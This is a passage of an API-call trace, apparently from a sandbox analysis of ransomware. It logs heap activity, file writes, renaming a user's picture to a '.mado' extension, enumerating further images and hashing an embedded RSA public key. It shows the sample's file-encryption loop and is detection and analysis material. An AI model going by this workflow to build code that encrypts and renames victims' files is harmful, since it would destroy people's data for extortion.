dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0204.834] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe538 | out: hHeap=0x2c0000) returned 1 [0204.834] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0204.834] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e51f8 | out: hHeap=0x2c0000) returned 1 [0204.834] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c8d0 | out: hHeap=0x2c0000) returned 1 [0204.834] GetCurrentThreadId () returned 0x600 [0204.834] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6bb80 [0204.834] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3b727a0 [0204.834] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0204.834] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0204.834] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0204.834] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0204.834] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0204.834] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6bc88 [0204.834] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.834] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.834] GetCurrentThreadId () returned 0x600 [0204.834] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.834] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.834] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0204.834] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.835] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.835] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.835] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.835] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0204.835] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6bd90 [0204.835] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0204.835] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c3a48 [0204.835] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0204.835] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6be98 [0204.835] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.835] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe538 [0204.835] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.835] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.835] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0204.835] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0204.835] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0204.835] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0204.835] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0204.835] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0204.835] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe4f0 [0204.835] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0204.835] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0204.835] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.835] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.835] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0204.835] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0204.835] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0204.835] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe508 [0204.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0204.836] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0204.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0204.836] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe4d8 [0204.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0204.836] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe550 [0204.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.836] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0204.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0204.836] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe520 [0204.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.836] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe568 [0204.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0204.836] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0204.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0204.836] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0204.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0204.836] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0204.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe4f0 | out: hHeap=0x2c0000) returned 1 [0204.836] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe4f0 [0204.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0204.836] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c8d0 [0204.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe538 | out: hHeap=0x2c0000) returned 1 [0204.836] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b6eb80 [0204.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe568 | out: hHeap=0x2c0000) returned 1 [0204.836] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x3b74b68 [0204.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0204.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x3b6edb0 [0204.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b780 | out: hHeap=0x2c0000) returned 1 [0204.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b6eec8 [0204.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe4f0 | out: hHeap=0x2c0000) returned 1 [0204.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x3b74d80 [0204.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eb80 | out: hHeap=0x2c0000) returned 1 [0204.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6bfa0 [0204.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0204.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321c00 | out: hHeap=0x2c0000) returned 1 [0204.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bd90 | out: hHeap=0x2c0000) returned 1 [0204.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bfa0 | out: hHeap=0x2c0000) returned 1 [0204.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36a0 | out: hHeap=0x2c0000) returned 1 [0204.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eec8 | out: hHeap=0x2c0000) returned 1 [0204.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74d80 | out: hHeap=0x2c0000) returned 1 [0204.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6edb0 | out: hHeap=0x2c0000) returned 1 [0204.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b790 | out: hHeap=0x2c0000) returned 1 [0204.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe520 | out: hHeap=0x2c0000) returned 1 [0204.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7b0 | out: hHeap=0x2c0000) returned 1 [0204.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe550 | out: hHeap=0x2c0000) returned 1 [0204.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0204.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe508 | out: hHeap=0x2c0000) returned 1 [0204.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe4d8 | out: hHeap=0x2c0000) returned 1 [0204.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0204.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0218 | out: hHeap=0x2c0000) returned 1 [0204.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc88 | out: hHeap=0x2c0000) returned 1 [0204.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe4c0 | out: hHeap=0x2c0000) returned 1 [0204.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b80e40 | out: hHeap=0x2c0000) returned 1 [0204.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c8d0 | out: hHeap=0x2c0000) returned 1 [0204.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6be98 | out: hHeap=0x2c0000) returned 1 [0204.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3a48 | out: hHeap=0x2c0000) returned 1 [0204.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ec98 | out: hHeap=0x2c0000) returned 1 [0204.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b3720 | out: hHeap=0x2c0000) returned 1 [0204.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0204.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0204.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5198 | out: hHeap=0x2c0000) returned 1 [0204.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0204.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0204.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0204.838] WriteFile (in: hFile=0x63c, lpBuffer=0x3b81690*, nNumberOfBytesToWrite=0x14b98, lpNumberOfBytesWritten=0x39cfb14, lpOverlapped=0x0 | out: lpBuffer=0x3b81690*, lpNumberOfBytesWritten=0x39cfb14*=0x14b98, lpOverlapped=0x0) returned 1 [0204.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b81690 | out: hHeap=0x2c0000) returned 1 [0204.839] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x14b9d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.839] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6bb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6bb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0204.839] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bb80 | out: hHeap=0x2c0000) returned 1 [0204.839] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384580 [0204.839] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x3b74b68 [0204.839] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", cchWideChar=-1, lpMultiByteStr=0x3b74b68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", lpUsedDefaultChar=0x0) returned 41 [0204.839] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x3b74f98 [0204.839] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.839] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384580 | out: hHeap=0x2c0000) returned 1 [0204.839] WriteFile (in: hFile=0x63c, lpBuffer=0x3b74f98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b74f98*, lpNumberOfBytesWritten=0x39cfb50*=0x28, lpOverlapped=0x0) returned 1 [0204.839] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74f98 | out: hHeap=0x2c0000) returned 1 [0204.839] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0204.839] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0204.839] CloseHandle (hObject=0x63c) returned 1 [0204.841] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0204.841] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x880) returned 0x3b74b68 [0204.841] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321c00 | out: hHeap=0x2c0000) returned 1 [0204.841] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vOxd2i6c5Aquj.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\voxd2i6c5aquj.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vOxd2i6c5Aquj.jpg.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\voxd2i6c5aquj.jpg.mado")) returned 1 [0204.841] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.842] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0204.843] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca3ed20, ftCreationTime.dwHighDateTime=0x1d5e184, ftLastAccessTime.dwLowDateTime=0xedcfbe00, ftLastAccessTime.dwHighDateTime=0x1d5e58a, ftLastWriteTime.dwLowDateTime=0xedcfbe00, ftLastWriteTime.dwHighDateTime=0x1d5e58a, nFileSizeHigh=0x0, nFileSizeLow=0x123f3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZS3LC6n3UMM.gif", cAlternateFileName="ZS3LC6~1.GIF")) returned 1 [0204.843] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3a48 [0204.843] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x76) returned 0x326020 [0204.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3a48 | out: hHeap=0x2c0000) returned 1 [0204.843] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZS3LC6n3UMM.gif") returned=".gif" [0204.843] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZS3LC6n3UMM.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zs3lc6n3umm.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0204.843] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=74739) returned 1 [0204.843] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0204.845] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x123cd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.845] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0204.847] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0204.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.847] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0204.847] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x123f3, lpOverlapped=0x0) returned 1 [0204.848] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.848] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0204.848] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.848] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.848] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321b78) returned 1 [0204.849] CryptCreateHash (in: hProv=0x321b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0204.849] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0204.849] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0204.849] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0204.849] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0204.849] GetLastError () returned 0x0 [0204.849] CryptDestroyHash (hHash=0x32ef238) returned 1 [0204.849] CryptReleaseContext (hProv=0x321b78, dwFlags=0x0) returned 1 [0204.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0204.849] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0204.849] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0204.849] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0204.849] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0204.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.849] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0204.849] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x123f0) returned 0x3b81690 [0204.850] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0204.850] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0204.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0204.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0204.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0204.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5198 [0204.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b80e40 [0204.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe4c0 [0204.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b80e88 [0204.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe4d8 [0204.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe508 [0204.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe550 [0204.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe520 [0204.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0204.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b72b80 [0204.850] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b72b80, Size=0x218) returned 0x3b7c8d0 [0204.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74b68 [0204.850] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe508 | out: hHeap=0x2c0000) returned 1 [0204.850] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe520 | out: hHeap=0x2c0000) returned 1 [0204.850] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe550 | out: hHeap=0x2c0000) returned 1 [0204.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0204.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe550 [0204.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 